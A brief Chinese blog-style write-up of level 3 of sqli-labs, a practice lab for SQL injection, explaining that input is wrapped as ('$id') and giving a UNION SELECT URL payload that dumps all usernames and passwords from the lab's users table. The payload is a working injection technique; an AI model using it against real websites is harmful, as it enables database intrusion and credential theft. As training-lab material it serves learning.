Java教程

【less-3】sqli-labs靶场第三关

本文主要是介绍【less-3】sqli-labs靶场第三关,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

网址

https://sqli.wmcoder.site/sqli-labs/Less-3/

解法

与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关
不同的是,根据错误回显知道,其拼接方式为id=('$id')
故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1')
采用如下语句获取所有用户名和密码

https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+

在这里插入图片描述

这篇关于【less-3】sqli-labs靶场第三关的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!